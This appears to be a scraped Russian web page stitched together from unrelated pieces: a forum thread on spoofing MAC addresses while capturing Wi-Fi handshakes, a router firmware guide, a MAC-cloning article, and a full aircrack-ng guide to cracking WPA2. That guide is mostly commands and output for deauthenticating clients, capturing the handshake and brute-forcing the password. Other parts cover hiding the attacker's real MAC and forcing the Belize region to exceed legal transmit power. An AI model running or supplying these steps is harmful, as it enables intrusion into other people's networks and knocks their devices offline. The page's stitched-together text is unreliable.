0 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Меняем MAC на Wive-NG

Содержание

Проблема При смене mac adress на wlan0mon некорректно работает airodump-ng

matroskamkv

Приветствую. Есть адаптер — TP-LINK TL-WN822N (rev v3) . В Kali (vbox) завёлся без проблем, сходу, из коробки. Обрадовался, но после появились нюансы.
Перевёл адаптер в режим монитора, после чего сменил mac adress wlan0mon на рандомный. Теперь при сканировании конкретной сети мне не показываются устройства, которые к ней подключены, соответственно я не могу послать —deauth команду. Без смены всё замечательно показывает.

Вопрос к знающим, так ли важно менять mac adress в режиме монитора, если задачей является только захват handshake, который в последующем будет брутится? Остаются ли какие-то данные о моём mac в роутере который я тестирую, если я захватываю handshake, после его подбираю и захожу на роутер уже с клиентского режима адаптера но со сменой mac? Интересует либо возможность заставить его работать с изменённым mac в monitor mode, либо информация о том, остаются ли какие-то следы о настоящем mac adress и вопрос как не спалить реальный mac adress своего адаптера. Заранее большое спасибо за помощь!

0v3r_Cr1t

matroskamkv

— airmon-ng check kill
— airmon-ng start wlan0
— ifconfig wlan0mon down
— macchanger -r wlan0mon
— ifconfig wlan0mon up
— airodump-ng wlan0mon
— airodump-ng —bssid [MAC адрес точки доступа] —channel № канала -w root/Desktot/wifi/filename wlan0mon

На всех этапах консоль не сигнализирует об ошибках, а в момент сканирования уже конкретной точки просто молча игнорирует подключённые к ней устройства, проверял без смены mac и со сменой на одной точке.

mrOkey

matroskamkv

TROOPY

Well-known member

Приветствую. Есть адаптер — TP-LINK TL-WN822N (rev v3) . В Kali (vbox) завёлся без проблем, сходу, из коробки. Обрадовался, но после появились нюансы.
Перевёл адаптер в режим монитора, после чего сменил mac adress wlan0mon на рандомный. Теперь при сканировании конкретной сети мне не показываются устройства, которые к ней подключены, соответственно я не могу послать —deauth команду. Без смены всё замечательно показывает.

Вопрос к знающим, так ли важно менять mac adress в режиме монитора, если задачей является только захват handshake, который в последующем будет брутится? Остаются ли какие-то данные о моём mac в роутере который я тестирую, если я захватываю handshake, после его подбираю и захожу на роутер уже с клиентского режима адаптера но со сменой mac? Интересует либо возможность заставить его работать с изменённым mac в monitor mode, либо информация о том, остаются ли какие-то следы о настоящем mac adress и вопрос как не спалить реальный mac adress своего адаптера. Заранее большое спасибо за помощь!

matroskamkv

Столкнулся с тем, что при подключении к kali у адаптера изначально левый mac. Я скопировал родной mac из ifconfig wlan0mon, перезагрузился и начал:
ifconfig wlan0 down
macchanger -m мой mac wlan0
ifconfig wlan0 up
ifconfig (убеждаюсь, что на client mode стоит мой родной mac)
airmon-ng check kill
airmon-ng start wlan0
ifconfig (убеждаюсь, что на montor mode стоит мой родной mac)
Сканирую сеть — находит подключённого клиента.
Перезагружаю машину, проделываю тоже самое только подставляю левый mac
Опять сканирую — ничего.

Есть какие-то другие способы?

У адаптера в клиент mode может быть любой mac, но стоит сменить mac в monitor mode, как он перестаёт ловить подключённые устройства.
[automerge]1523352144[/automerge]
Более того, сейчас подключился к сети, от которой знаю пароль, после смены mac, в настройках сети в поле mac adress стоит мой родной mac, при попытках вписать другой в это поле и поле «cloned mac adress» ничего не происходит, а через ifconfig в поле «ether» показывает мой родной mac.
Менял двумя способами
macchanger -r wlan0
ifconfig wlan0 hw ether 00:00:00:00:00:00
После подключения к wifi, в поле ether (ifconfig) показывается мой родной mac. Видимо прав @mrOkey , не так-то всё просто из коробки. Без понятия как гуглить инфу. Буду рад помощи ещё и по этому вопросу :c

Просто сайт

ОС вашего телефона:

Wive-NG или делаем из ASUS RT-N10+ конфетку

Когда мне провели оптоволокно, я пошел в магазин и купил первый попавшийся роутер — ASUS RT-N10+. Вот он:

Обошлось это чудо в 1300 рублей. Родная прошивка была очень удобной, с «домохозяйским» интерфейсом, но тормозила. Через пару лет выяснилось, что, скорости больше 30 мегабит этот девайс уже не переваривает — торрент клиент на этой скорости завешивал его практически полностью.

Тогда я стал искать альтернативные прошивки. Самая известная — DD-WRT. Я поставил сборку под мой роутер, но был разочарован — скорость работы не возросла (как я узнал позже, драйвера использовались те же, что в родной прошивке), а те настройки, которые до этого делались парой кликов (вроде переброса порта для IPTV) можно было сделать только через правку конфигов. И это при том, что веб интерфейс просто перегружен всевозможными опциями. Других прошивок я на тот момент не нашел и на это дело забил.

Но совсем недавно я наткнулся на Wive-NG и, о чудо, у них оказалась сборка под моё железо! Все нужные настройки остались на месте, а роутер перестал резать скорость (оказывается, у меня 20 мегабит на передачу). Расскажу об установке.

Во-первых надо разобраться с моделью роутера. Асус выпустил около десяти разных RT-N10 — B1, C1, D1, LX и другие. Посмотреть версию можно на наклейке снизу роутера. Прошивка гарантированно подойдет к RT-N10+, RT-N10 B1, RT-N10 C1 и гарантированно не подойдет к простому RT-N10 (но зато для него есть прошивка от Олега). Насчет других моделей ничего конкретного сказать не могу.

Теперь перейдем к самой прошивке. На форумах обычно предлагают один из вариантов:

  • Установка DD-WRT через веб-интерфейс родной прошивки и затем установка Wive-NG через неё.
  • Заливка через JTAG
  • Прошивка через TFTP

Первый вариант у меня не заработал — DD-WRT вражеский файл шить не захотел. Для второго у меня нет кабеля, а третий я не пробовал — не уверен, можно ли его вообще прошить через этот интерфейс (UPD: всё-таки можно). К счастью, с моим роутером всё оказалось проще — есть утилита восстановления, через которую можно прошить что угодно. Итак, начнем:

  1. Скачиваем сборку Wive-NG RTNL (нас интересует Wive_WR-150N-RT3050-1T1R), а также набор утилит с сайта Асуса (UPD: похоже утилиты с сайта пропали, перезазил их на Я.Диск) или с диска из комплекта. Советую также скачать официальную прошивку — если что-то пойдёт не так, можно будет всё вернуть назад.
  2. Устанавливаем утилиты. Важный момент — программа восстановления работает только через проводное соединение, так что ищите сетевой кабель.
  3. Отключаем питание роутера, зажимаем Reset и включаем. Держать кнопку нужно около десяти секунд.
  4. В самом компьютере идём в «Сетевые подключения» и открываем свойства адаптера, через который подключен роутер. Нажимаем Протокол Интернета версии 4 → Свойства и указываем адрес 192.168.1.2 и маску 255.255.255.0 . Все остальные адаптеры рекомендую отключить — из-за них программа может не увидеть роутер.
  5. Запускаем утилиту и выбираем прошивку. Думаю, что интерфейс вопросов не вызовет:

  1. Прошиваем. По окончанию требуется некоторое время подождать, пока роутер загрузится. Если ожидание затянулось и веб-интерфейс всё не открывается, попробуйте отключить и подключить питание.
  2. Логин и пароль к веб-интерфейсу — Admin / Admin , оба с заглавной буквы. Если после ввода данных вы видите нечто, похоже на скриншот ниже, то прошивка прошла успешно. Если же ничего не работает и хочется вернуть как было, просто повторите шаги 2-6, но уже с официальной прошивкой. Также не забудьте вернуться в «Сетевые подключения» и вернуть настройки как было — на автоматическое получение IP и DNS адресов.

Интерфейс описывать не буду, всё достаточно интуитивно и знакомо тем, кто хоть раз настраивал роутер. Остановлюсь лишь на некоторых моментах:

  • Мощность WI-FI по умолчанию — 70%. Если хочется, чтобы «било» дальше, имеет смысл поставить 100%. Для этого заходим в Wireless Settings → Advanced и меняем TX Power
  • Многие сервисы отключены для экономии ресурсов. Среди них и UPNP, позволяющий программам самим перебрасывать порты. Скайп и торрент-клиенты могут работать и без него, а вот игры и менее продвинутый софт часто спотыкаются. Для включения идём в Services → Miscellaneous , включаем Auto portmap service и сохраняем.
  • Если собираетесь перебрасывать порты в настройках файрвола, обратите внимание на переключатель WAN/VPN. Скорее всего вам нужен именно VPN.
  • При настройке подключения, обратите внимание на галочку Enable NAT в разделе WAN setup . Советую её включить, иначе роутер будет отдавать провайдеру MAC-адреса всех подключенных к нему устройств. У филиала Ростелекома, к которому я раньше был подключен, на количество этих самых адресов оказался лимит 🙂
  • И, наконец, момент, касающийся конкретно RT-N10+. Порты на роутере пронумерованы вот так:

Взлом WiFi (миллионный гайд по aircrack-ng)

lolik228

Новорег

Сталкиваясь на форуме с вопросами типа «Как взломать wifi», «aircrack-ng — что это? как пользоваться?», решил ответить на эти вопросы и постараться пошагово описать процесс взлома с помощью aircrack-ng.

Метод основан на перехвате и переборе handshake. WPA2

Весь процесс будет описан на примере Debian (Linux дистрибутив). Процесс не отличается на тех же Linux mint, Ubuntu(xubuntu, lubuntu и прочее гавно и т.д.), Kali linux, Arch (Manjaro), rpm-дистрибутивы (OpenSuse, Fedora), короче на любом линуксе. Отличается лишь процесс установки aircrack-ng.

Все действия происходят в терминале (консоли).

Что бы использовать aircrack-ng, не обязательно использовать kali linux. Он без проблем работает на любом дистрибутиве без танцев.
Что бы установить его, заходим в терминал и пишем:

sudo apt-get install aircrack-ng
Подтверждаем установку и ждём. Пакеты имеют небольшой размер, поэтому всё ставится за несколько секунд.

Всё, aircrack установлен, больше нам ничего не потребуется. Идём дальше.
2. Процесс взлома.

Дальше всё сводится тупо к вводу комманд в терминале и ожидании. Идём по порядку.

2.1 Переводим wifi карту в режим мониторинга.

Первым делом смотрим имя вашего wifi интерфейса. В терминале пишем.

sudo iwconfig
Наблюдаем следующую картину:

lo no wireless extensions.

wlan0 IEEE 802.11 ESSID: off/any
Mode: Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit: 7 RTS thr: off Fragment thr: off
Encryption key: off
Power Management: off

eth0 no wireless extensions.
Видим, что наш wifi интерфейс называется wlan0. Он может иметь и другое название, к примеру wlo0, wlan1 и т.д. Запоминаем его, или просто копируем в буфер обмена.

Теперь зная имя нашего интерфейса, можем перевести карту в режим мониторинга. Вводим в терминале:

sudo airmon-ng start wlan0
Если имя вашего интерфейса отличается от приведённого примера, просто замените wlan0 на ваше. (sudo airmon-ng start имя_вашего_интерфейса)

Теперь в терминале наблюдаем следующую картину:

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

Предпоследняя строчка указывает нам, что карта перешла в режим мониторинга. (monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
Теперь имя интерфейса изменилось. В конце мы видим что оно изменилось c wlan0 на wlan0mon ([phy0]wlan0 on [phy0]wlan0mon).

Для перестраховки вводим в терминале iwconfig ещё раз.

«sudo iwconfig»
Картина с прошлого раза изменилась. А конкретно изменилось название интерфейса:

lo no wireless extensions.

eth0 no wireless extensions.

wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
Retry short limit:7 RTS thr: off Fragment thr: off
Power Management: off

Имя wlan0mon, Mode:Monitor. Всё что нам нужно. Переходим к следующему шагу.

2.2 Сканируем близлежащие WIFI точки.

Для того, что бы сканировать wifi точки, находящиеся рядом с вами, с последующим выбором цели для взлома, вводим в терминале:

«sudo airodump-ng wlan0mon»
Обратите внимание на название интерфейса в конце, вводится уже интерфейс, работающий в режиме мониторинга wlan0mon. У вас оно может отличаться, к примеру mon0. Просто заменяете на ваше. sudo airodump-ng имя_вашего_интерфейса (sudo airodump-ng mon0).

В терминале теперь наблюдаем примерно следующую картину:
CH 2 ][ Elapsed: 12 s ][ 2018-04-11 13:40

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

A1:B2:C3 4:E5:F6 -87 1 0 0 11 54e. WPA2 CCMP PSK WIFI-1
64:65:66:9C:8C:7C -49 39 0 0 11 54e. OPN WIFI2
C1:7D:F8:23:62:51 -63 39 0 0 6 54e. WPA2 CCMP PSK FacoN_wifi

BSSID STATION PWR Rate Lost Frames Probe

C1:7D:F8:23:62:51 B5:A8:7C:5F:E8 1 -87 0 — 6 0 1

Будут бегать цифры, постоянно изменяться информация, что то появляться, исчезать. Теперь поподробнее рассмотрим что мы видим из всего этого, и какую информацию можем извлечь для себя.

Что обозначают некоторые элементы и что нам из этого нужно. Всё что не рассматривается — нас не интересует в данный момент):

Верхняя часть:
BSSID — mac адреса wifi точек
PWR — если объяснить по русски, то это мощность сигнала, т.е. как далеко находится от нас wifi точка. Чем значение выше, тем лучше сигнал, а значит и точка находится ближе к нам (всё конечно утрированно, различные помехи, преграды wifi сигналу и так далее.Уровень сигнала не всегда показавыает, что одна точка находится ближе другой) В нашем примере, сигнал точки WIFI2 ловит лучше, чем сигнал точки Runion_wifi, так как значение PWR выше у WIFI2.
CH — канал, на котором работает wifi точка.
ENC — защита wifi точки. OPN показывает, что на точке нет пароля для подключения по wifi. WEP, WPA или WPA2 показывают, что точка защищена паролем.
ESSID — имя wifi точки.

В нижней части нас интересуют всего 2 показателя:

BSSID — mac адрес wifi роутера (тоже, что и в верхней части)
STATION — mac адреса клиентов, подключённых в данный момент к какой либо точке wifi.

В верхней части видим доступные точки wifi. В нашем примере их 3. WIFI-1, WIFI2 и Runion_wifi. В нижней части видим подключенных на данный момент клиентов к этим wifi. Сейчас подключен только 1 клиент к одной wifi точке, конкретно к mac адресу C1:7D:F8:23:62:51. В верхyей части видим, что этот mac принадлежит FacoN_wifi. Пароль к нему мы и попытаемся заполучить.
Теперь когда цель выбрана, которую решили взломать, нажимаем в терминале ct
ctrl+c
и переходим к следующему шагу.

2.3 Сканируем определённую точку, которую необходимо взломать.

Копируем mac адрес необходимой точки (в нашем случае C1:7D:F8:23:62:51 от FacoN_wifi) и вводим следующую команду в терминале:

sudo airodump-ng wlan0mon —bssid C1:7D:F8:23:62:51 -c 6 -w handshake
Что тут за что отвечает и какие значения подставлять:

wlan0mon — имя вашего интерфейса, переведённого в режим мониторинга
—bssid C1:7D:F8:23:62:51 — мак адрес сканируемой точки. значение C1:7D:F8:23:62:51 заменяете на своё, точнее на мак адрес точки, которую выбрали в качестве цели
-c 6 — канал, на котором работает целевая точка. Из предыдущей команды мы видим, что интересующая нас точка Runion_wifi работает на 6 канале (значение CH 6), поэтому мы вписываем 6. Вы же вписываете то значение, которое у вас
-w handshake — имя файла, в который сохранится пойманный нами handshake. Можно вписать любое значение, (-w gospodipomogi)

Всё, точка сканируется. В терминале должно появиться теперь нечто подобное:

CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi

BSSID STATION PWR Rate Lost Frames Probe

C1:7D:F8:23:62:51 B5:A8:7C:5F:E8 1 -22 0 — 2e 0 9 FacoN_wifi

Картина тут такая же, как и в прошлом пункте, только теперь
сканируются не все точки, а только одна, да и к тому же при ловле
handshake, он сохраниться в файле, что нам и необходимо.
Теперь существует 2 варианта развития событий:

1 — на точке нет подключённых клиентов. Решение тут одно — ждать.
Ждать подключения клиентов. Ожидание может занять большое колличество
времени, но ничего тут не поделаешь. Как говориться на халяву и уксус
сладкий. Хочешь халявы — жди. Когда клиент подключится к точке, в 95%
случаев мы автоматически перехватим handshake, и дальше останется только
последний шаг — перебор.
Как определить, что handshake пойман:

В самом правом верхнем углу в терминале появится соответствующая запись. (Естественно при включенном сканировании).

CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi

BSSID STATION PWR Rate Lost Frames Probe

C1:7D:F8:23:62:51 B5:A8:7C:5F:E8 1 -22 0 — 2e 0 9 FacoN_wifi
WPA handshake: C1:7D:F8:23:62:51

2 — это когда клиент (или клиенты) уже подключены к точке, но
handshake мы ещё не поймали. Тут нужно теперь отключить клиента
(клиентов) от точки, и ждать когда они переподключатся. В этот момент
переподключения мы и сможем поймать наш заветный handshake. Вопрос
теперь — как их отключить? Переходим к следующему шагу.
P.s.: Открытое сканирование мы не закрываем и не останавливаем, пока не поймаем handshake
2.4 Отключаем подключенных клиентов к точке и ловим handshake.
Открываем новую вкладку терминала, или новое окно, тут уже как удобней. (Новую вкладку можно открыть комбинацией клавиш ctrl+shift+t, если не открылась, то открывайте новое окно тогда.)
Вводим следующую команду в терминале, подставляя свои значения. Ещё раз повторюсь, не отключаем сканирование airodump-ng.

sudo aireplay-ng wlan0mon -0 15 —ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E8 1

Что тут за что отвечает и какие значения подставлять:

wlan0mon — имя вашего интерфейса, переведённого в режим мониторинга.
-0 15 — не трогаем, оставляем как есть.
—ignore-negative-one — не трогаем
-a C1:7D:F8:23:62:51 — тут вводится мак адрес wifi точки. Меняете значение на своё.
-c B5:A8:7C:5F:E8 1- а здесь вводится мак адрес подключённого клиента. Взять его можно из
запущенного окна сканирования airodump-ng внизу в столбце STATION. Если у
вас там пусто, значит клиента на точке ещё нет, и нужно ждать когда он
появится. Если там несколько mac адресов, то выбираете тот, который
более активный, то есть в столбце Frames будет чаще всего изменяться
цифра.

Теперь, когда подставили свои значения,
нажимаем enter и смотрим. Должны постоянно появляться новые строчки, и
вывод в терминале должен выглядеть примерно так:
15:54:01 Waiting for beacon frame (BSSID: C1:7D:F8:23:62:51) on channel 6
15:54:01 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:03 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [11|64 ACKs]
15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 3|64 ACKs]
15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 0|64 ACKs]
15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 5|65 ACKs]
15:54:08 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8 1] [ 4|64 ACKs]

Если строчки бегут, и вывод в терминале у вас совпадает с выводом,
представленный в примере, открываем вкладкуокно терминала, где запущено
сканирование airodump-ng, и ждём заветной строчки в правом верхнем углу
терминала WPA handshake: C1:7D:F8:23:62:51
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi

BSSID STATION PWR Rate Lost Frames Probe

C1:7D:F8:23:62:51 B5:A8:7C:5F:E8 1 -22 0 — 2e 0 9 FacoN_wifi

Если строчка не появилась, значит мы не поймали handshake. Повторяем команду:

sudo aireplay-ng wlan0mon -0 15 —ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E8 1

Повторяем до тех пор, пока не поймаем handshake. Если повторили раз 10-20 и до сих пор не поймали, значит пробуем сменить mac адрес клиента. (если
конечно он есть. В окне airodump-ng внизу в столбце STATION показаны мак адреса всех подключеных клиентов, выбираем другой и повторяем aireplay-ng снова).
Если строчка WPA handshake: C1:7D:F8:23:62:51 появилась, необходимо подстраховаться и проверить, действительно ли мы поймали наш handshake.
Вводим в новом окневкладке терминала следующую команду:

handshake-01.cap — это название файла, введённый нами ранее в самом начале пункта 2.3
Просто пример из пункта 2.3 данной статьи

sudo airodump-ng wlan0mon —bssid C1:7D:F8:23:62:51 -c 6 -w handshake

-w handshake — именно это и нужно вводить, только уже без -w
Вывод в терминале должен выглядеть примерно следующим образом:

Opening handshake-01.cap
Read 179 packets.

# BSSID ESSID Encryption

1 C1:7D:F8:23:62:51 FacoN_wifi WPA (1 handshake)

Choosing first network as target.

Opening handshake-01.cap
Please specify a dictionary (option -w).

Quitting aircrack-ng.
Обратите внимание, что первоначально мы вводили просто handshake, а получили на выходе handshake-01.cap.
Это особенность программы. .сap это расширение сохранённого файла, а
-01 дописывается автоматически, вобщем имейте ввиду. Так же учитывайте,
что расширение должно быть именно .cap. airodump сохранил файлы в
нескольких форматах, .cap, .csv и .kismet.netxml. Нас интересует именно .cap.
Всё. Теперь когда мы видим строчку WPA (1 handshake), можем остановить сканирование airodump-ng комбинацией клавиш ctrl+c. Остался последний шаг — перебор.
2.4 Перебор handshake по словарю.
Так как статья описывает взлом только лишь при помощи aircrack-ng, то и пример перебора покажу на aircrack-ng.
Естественно лучше использовать hashcat, и перебирать на gpu, но это уже совсем другая история.
Итак тут всё просто, подготавливаем словарь с паролями, и в терминале вводим следующее:
aircrack-ng -w /home/user/worlist handshake-01.cap
Тут надеюсь всё понятно.

-w /home/user/worlist — словарь с паролями, где /home/user/worlist это абсолютный путь до словаря
handshake-01.cap — наш файл с handshake. Мы его рассматривали ранее.

И всё, осталось только ждать. Должны быстро меняться цифры, буквы, короче будет визуально понятно что перебор пошёл.
Когда пароль будет подобран, в терминале должно появиться нечто подобное:

Aircrack-ng 1.2 rc4

[00:00:00] 7/9 keys tested (276.54 k/s)

Time left: 0 seconds 77.78%

KEY FOUND! [ 12345678 ]

Master Key : 64 5E 1B 0F 3C 93 74 84 B3 05 14 9D F5 64 E4 1C
56 BC B2 85 75 62 6E 97 BA 74 2A 45 17 DA 4E 93

Transient Key : 51 01 AC E7 19 1C C7 87 1D A9 70 38 AE D2 72 21
60 55 48 5F 8D D6 0A 33 B2 93 67 42 34 37 EB F7
B0 E7 B5 D8 52 8A A6 FB 83 36 4B F8 31 3B 24 F7
0D A0 75 94 F8 9F 14 7E 8A 5A 2E A4 26 12 BD 82

MAC Адрес Роутера — Где Посмотреть и Как Узнать, Поменять или Клонировать на TP-Link, Asus, Zyxel Keenetic, Tenda?

Как узнать и клонировать MAC адрес на роутер с компьютера и для чего вообще его нужно менять? Я покажу подробно, как посмотреть MAC на маршрутизаторах таких фирм, как TP-Link, Asus, Zyxel Keenetic и Tenda. И конечно же, в этой статье расскажу, как его поменять.

Зачем клонировать MAC адрес с компьютера на маршрутизатор?

MAC Адрес — это физический идентификатор цифрового устройства. Он уникален и у каждого компьютера, ноутбука, смартфона, IP камеры и т.д. свой MAC адрес. Если говорить точнее, то это id порта WAN. То есть сетевого адаптера вашего устройства.

Бывают такие провайдеры, которые привязывают MAC адрес компьютера пользователя к своему оборудованию. Они просто прописывают его на своем роутере, или шлюзе, через который осуществляется выход во всемирноюую сеть.

На практике это означает, что выйти в интернет вы можете только с одного компьютера или ноутбука, который подключен напрямую кабелем от провайдера. Если же подсоединить другое устройство, то соответственно его MAC адрес другой. О нем провайдер не знает, и не дает ему доступа в сеть.

В итоге получается такая ситуация, что когда вы ставите в свой дом роутер, он не может подключиться к интернету, хотя все настройки введены правильно.

Как узнать MAC адрес роутера?

Так вот, знание MAC адреса своего нового роутера как раз нам может пригодиться, чтобы назвать его провайдеру. Для того, чтобы он поменял свои настройки и привязал его вместо старого от компьютера, и у вас снова был интернет. Узнать MAC адрес маршрутизатора можно двумя способами.

  • На информационной этикетке, которая размещена на днище корпуса роутера
  • В панели управления администраторским разделом

Есть и еще один способ — через командную строку Windows. Однако для обычного пользователя это будет трудновато. Да и зачем усложнять себе жизнь, если все можно сделать гораздо проще.

Как узнать MAC адрес маршрутизатора из наклейки на корпусе роутера

На любом роутере имеется наклейка с информацией о подключении к нему. Там обычно указывается название wifi сети, адрес входа, логин и пароль для авторизации. И необходимый нам MAC адрес.

  • Вот пример этикетки с маршрутизатора TP-Link
  • А вот как она выглядит на Asus
  • Zyxel Keenetic
  • D-Link
  • Tenda
  • Netis
  • TotoLink

Где в настройках роутера узнать MAC адрес?

Если же у вас есть доступ к панели управления своим маршрутизатором, то его MAC адрес обычно отображается сразу на стартовой странице. После того, как вы в ней авторизуетесь.

  • Посмотрите, как выглядит мак адрес в админке TP-Link
  • Asus
  • Zyxel Keenetic
  • D-Link

На моделях других производителей все выглядит примерно так же. Думаю, нет смысла показывать больше, все и так понятно.

Как поменять MAC адрес роутера для WAN порта?

Однако сообщать MAC своему провайдеру сегодня уже не обязательно. Даже если такое требование о привязке имеется в договоре. Производители сетевого оборудования заранее позаботились о нас с вами и встроили возможность клонировать MAC порта WAN роутера с сетевой карты основного компьютера.

Для этого не нужно даже его узнавать на самом ПК. Клонирование происходит автоматически.

В этом случае оборудование интернет-оператора не заметит подмены адреса WAN одного устройства на другое, и дополнительно сообщать ничего не нужно. Помню, на заре эпохи развития wifi некоторые компании вообще запрещали ставить роутер и требовали платить за подключение каждого нового компьбтера отдельно.

Какой MAC адрес прописать на роутере?

Итак, если до покупки роутера у вас интернет был подключен по кабелю к ПК, то именно с него и нужно клонировать MAC адрес. Для того, чтобы сделать это, нужно выполнять первоначальное подключение роутера к интернету именно с того компьютера, к которому шел кабель от поставщика услуг.

Таким образом, зайдя в админку маршрутизатора, он увидит MAC адрес именно с того компьютера или ноутбука, с которого вы подключились к wifi. Все, что остаётся нам сделать, это прописать его в автоматическом режиме с помощью встроенного функционала.

Как посмотреть и изменить MAC адрес на роутере TP-Link?

Чтобы клонировать MAC адрес с компьютера на маршрутизатор TP-Link, нужно зайти в основном меню в «Дополнительные настройки». И далее открыть рубрику «Сеть — Интернет». Здесь во втором блоке мы увидим интересующие нас конфигурации. Ставим флажок на пункте «Использовать текущий MAC-адрес компьютера» и жмем на кнопку «Сохранить».

Если на вашем роутере TP-Link панель управления старого образца, то в ней открываем раздел «Сеть — Клонирование MAC-адреса» и нажимаем на одноименную кнопку для копирования с компьютера.

Вручную ничего прописывать не нужно. MAC адрес роутера сам автоматически поменяется, подтянув его с компьютера. Думаю, что с этим вопросом все понятно. Если нет, то рекомендую ознакомиться еще со статьей на блоге техподдержки ТП-Линк.

Как посмотреть и сменить MAC адрес на роутере ASUS

В маршрутизаторах Асус настройка расположена в разделе «Интернет». Здесь нужно просто найти соответствующее поле и нажать на кнопку «Клонировать MAC».

Как узнать и поменять MAC адрес на роутере Zyxel Keenetic

Для того, чтобы изменить параметры интернета на роутере Zyxel Keenetic, мы находим в нижнем меню значок «Глобуса» и переключаемся в этом разделе на вкладку «Подключение». Здесь отобразится текущее сетевое соединение с названием «Broadband Connection» — нажимаем мышкой на него.

Откроются детальные настройки, среди которых находим пункт «MAC-адрес». Из выпадающего списка выбираем «Взять с вашего ПК». После чего нажимаем на кнопку «Применить».

Если говорить о новой прошивке, от функция смены MAC адреса находится в разделе «Интернет — Проводной». Здесь нужно найти блок настроек «Параметры IP и DNS». Выбираем из выпадающего списка «Взять с вашего ПК»

На случай, если по каким-то причинам этот вариант не работает, либо к провайдеру был привязан какой-то компьютер, которого давно у вас уже нет, то можно выбрать «Ввести вручную» и прописать его самостоятельно.

В дополнение к вышенаписанному можете также почитать официальные инструкции от службы поддержки Zyxel — для старой прошивки и новой.

Клонирование MAC на маршрутизаторе Netis

В случае с Netis вообще никуда глубоко залезать не нужно — функция сразу отображается на стартовой странице панели администратора. Просто ставим галочку на «Клон MAC» и нужная нам настройка автоматом подхватится с основого компьютера.

Смена MAC адреса на роутере Tenda

Для смены MAC в маршрутизаторах Tenda заходим в меню «Настройки системы» и выбираем здесь «WAN настройки».

В новом окне в выпадающем списке «MAC-адрес» выбираем «Клонировать локальный MAC-адрес»

И нажимаем кнопку «Сохранить». Роутер найдет и применит к себе MAC адрес, который имеется у компьютера, с которого вы зашли в админку роутера. После перезагрузки доступ в Интернет будет открыт.

Видео по клонированию МАК адреса

TP-Link

D-Link

Меняем MAC на Wive-NG

В этой статье мы рассмотрим новый функционал и особенности работы утилит для пентеста беспроводных сетей после недавнего обновления функционала. Основной упор сделаем на увеличение мощности WiFi сигнала при вардрайвинге и атаки на WPS.

Прощай Боливия здравствуй Белиз. До относительно недавнего времени «тюнинг» работы нашего беспроводного адаптера можно было сделать , если выставить регион BO , но все меняется ничего не стоит на месте, регион BO не работает , что же делать спросите вы? На текущий момент работает регион BZ. Вместо привычным нам iw reg set BO мы используем iw reg set BZ. После этого мы можем играть с каналами и мощностью. Смена mac адреса, осталась без изменений с использованием привычного ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX или для ленивых macchanger -r wlan0 для случайного адреса, macchanger -m XX:XX:XX:XX:XX:XX wlan0 для конкретного.

Почему мы меняем регион на Белиз (раньше на Боливию)? Дело в том, что в большинстве стран законодательно запрещено использовать мощность WiFi устройств свыше 20 dBm и количество каналов свыше 12, а в Белизе таких ограничений нет.

ifconfig wlan0 down — выключаем интерфейс
macchanger -r wlan0 — меняем MAC
iw reg set BZ — выставляем регион Белиз
iwconfig wlan0 txpower 30 — увеличиваем мощность
ifconfig wlan0 up — поднимаем интерфейс

Новый airmon-ng, или прощай mon0. Когда беспроводной адаптер работает хорошо, когда у нас все получается это не может не радовать , но иногда возникают сложности и нам надо их решать, новый ключ –verbose у утилиты airmon-ng поможет нам в этом, что не может не радовать. Запуск утилиты теперь выглядит так: airmon-ng –verbose start wlan0. Вместе с новым ключом появился новый интерфейс, вместо привычного всем mon0 у нас wlan0mon.

Новый airodump-ng или здравствуй wps. Раньше используя утилиту airodump-ng было очень неудобно, приходилось использовать сторонние утилиты, что-бы определить вкючен ли на AP wps или нет, теперь у нас появилось два новых полезных ключа —wps и —uptime. Первый показывает поддерживает ли точка wps и… метод включения wps на точке.

USB = USB method,

